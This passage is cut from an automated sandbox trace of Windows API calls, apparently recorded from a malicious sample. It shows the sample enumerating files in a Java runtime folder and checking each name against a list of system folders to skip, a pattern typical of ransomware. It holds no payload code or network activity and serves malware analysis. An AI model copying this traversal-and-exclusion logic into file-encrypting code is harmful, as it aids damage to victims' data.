lpUsedDefaultChar=0x0) returned 9 [0069.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glass.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glass.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="glass.dll", lpUsedDefaultChar=0x0) returned 9 [0069.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0069.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.472] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="glib-lite.dll", cAlternateFileName="GLIB-L~1.DLL")) returned 1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2=".") returned 1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="..") returned 1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="...") returned 1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="windows") returned -1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="recovery") returned -1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="perflogs") returned -1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="documents and settings") returned 1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="system volume information") returned -1 [0069.472] lstrcmpiW (lpString1="glib-lite.dll", lpString2="msocache") returned -1 [0069.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glib-lite.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glib-lite.dll", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="glib-lite.dll", lpUsedDefaultChar=0x0) returned 13 [0069.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0069.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glib-lite.dll", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="glib-lite.dll", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="glib-lite.dll", lpUsedDefaultChar=0x0) returned 13 [0069.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.472] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.472] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x97440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="gstreamer-lite.dll", cAlternateFileName="GSTREA~1.DLL")) returned 1 [0069.472] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2=".") returned 1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="..") returned 1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="...") returned 1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="windows") returned -1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="recovery") returned -1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="perflogs") returned -1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="documents and settings") returned 1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="system volume information") returned -1 [0069.473] lstrcmpiW (lpString1="gstreamer-lite.dll", lpString2="msocache") returned -1 [0069.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gstreamer-lite.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0069.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gstreamer-lite.dll", cchWideChar=18, lpMultiByteStr=0x241330, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gstreamer-lite.dll", lpUsedDefaultChar=0x0) returned 18 [0069.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gstreamer-lite.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0069.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gstreamer-lite.dll", cchWideChar=18, lpMultiByteStr=0x241268, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gstreamer-lite.dll", lpUsedDefaultChar=0x0) returned 18 [0069.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0069.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.473] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x26a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="hprof.dll", cAlternateFileName="")) returned 1 [0069.473] lstrcmpiW (lpString1="hprof.dll", lpString2=".") returned 1 [0069.473] lstrcmpiW (lpString1="hprof.dll", lpString2="..") returned 1 [0069.473] lstrcmpiW (lpString1="hprof.dll", lpString2="...") returned 1 [0069.473] lstrcmpiW (lpString1="hprof.dll", lpString2="windows") returned -1 [0069.473] lstrcmpiW (lpString1="hprof.dll", lpString2="recovery") returned -1 [0069.473] lstrcmpiW (lpString1="hprof.dll", lpString2="perflogs") returned -1 [0069.473] lstrcmpiW (lpString1="hprof.dll", lpString2="documents and settings") returned 1 [0069.474] lstrcmpiW (lpString1="hprof.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.474] lstrcmpiW (lpString1="hprof.dll", lpString2="system volume information") returned -1 [0069.474] lstrcmpiW (lpString1="hprof.dll", lpString2="msocache") returned -1 [0069.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hprof.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hprof.dll", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hprof.dll", lpUsedDefaultChar=0x0) returned 9 [0069.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hprof.dll", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0069.474] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hprof.dll", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hprof.dll", lpUsedDefaultChar=0x0) returned 9 [0069.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.474] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0069.474] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e240, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="instrument.dll", cAlternateFileName="INSTRU~1.DLL")) returned 1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2=".") returned 1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="..") returned 1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="...") returned 1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="windows") returned -1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="recovery") returned -1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="perflogs") returned -1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="documents and settings") returned 1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.474] lstrcmpiW (lpString1="instrument.dll", lpString2="system volume information") returned -1 [0069.475] lstrcmpiW (lpString1="instrument.dll", lpString2="msocache") returned -1 [0069.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="instrument.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="instrument.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="instrument.dll", lpUsedDefaultChar=0x0) returned 14 [0069.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0069.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="instrument.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="instrument.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="instrument.dll", lpUsedDefaultChar=0x0) returned 14 [0069.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0069.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0069.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.475] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4a40, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="j2pcsc.dll", cAlternateFileName="")) returned 1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2=".") returned 1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="..") returned 1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="...") returned 1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="windows") returned -1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="recovery") returned -1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="perflogs") returned -1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="documents and settings") returned 1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="system volume information") returned -1 [0069.475] lstrcmpiW (lpString1="j2pcsc.dll", lpString2="msocache") returned -1 [0069.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pcsc.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pcsc.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="j2pcsc.dll", lpUsedDefaultChar=0x0) returned 10 [0069.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pcsc.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pcsc.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="j2pcsc.dll", lpUsedDefaultChar=0x0) returned 10 [0069.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0069.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0069.476] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="j2pkcs11.dll", cAlternateFileName="")) returned 1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2=".") returned 1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="..") returned 1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="...") returned 1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="windows") returned -1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="recovery") returned -1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="perflogs") returned -1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="documents and settings") returned 1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="system volume information") returned -1 [0069.476] lstrcmpiW (lpString1="j2pkcs11.dll", lpString2="msocache") returned -1 [0069.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pkcs11.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pkcs11.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="j2pkcs11.dll", lpUsedDefaultChar=0x0) returned 12 [0069.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pkcs11.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0069.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="j2pkcs11.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="j2pkcs11.dll", lpUsedDefaultChar=0x0) returned 12 [0069.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.476] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.476] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x5240, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jaas_nt.dll", cAlternateFileName="")) returned 1 [0069.476] lstrcmpiW (lpString1="jaas_nt.dll", lpString2=".") returned 1 [0069.476] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="..") returned 1 [0069.476] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="...") returned 1 [0069.476] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="windows") returned -1 [0069.477] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="recovery") returned -1 [0069.477] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="perflogs") returned -1 [0069.477] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="documents and settings") returned 1 [0069.477] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.477] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="system volume information") returned -1 [0069.477] lstrcmpiW (lpString1="jaas_nt.dll", lpString2="msocache") returned -1 [0069.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0069.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaas_nt.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaas_nt.dll", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jaas_nt.dll", lpUsedDefaultChar=0x0) returned 11 [0069.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0069.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaas_nt.dll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0069.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaas_nt.dll", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jaas_nt.dll", lpUsedDefaultChar=0x0) returned 11 [0069.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.477] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8640, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="jabswitch.exe", cAlternateFileName="JABSWI~1.EXE")) returned 1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2=".") returned 1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="..") returned 1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="...") returned 1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="windows") returned -1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="recovery") returned -1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="perflogs") returned -1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="documents and settings") returned 1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="$RECYCLE.BIN") returned 1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="system volume information") returned -1 [0069.477] lstrcmpiW (lpString1="jabswitch.exe", lpString2="msocache") returned -1 [0069.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jabswitch.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.477] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jabswitch.exe", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jabswitch.exe", lpUsedDefaultChar=0x0) returned 13 [0069.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jabswitch.exe", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jabswitch.exe", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jabswitch.exe", lpUsedDefaultChar=0x0) returned 13 [0069.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.478] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) 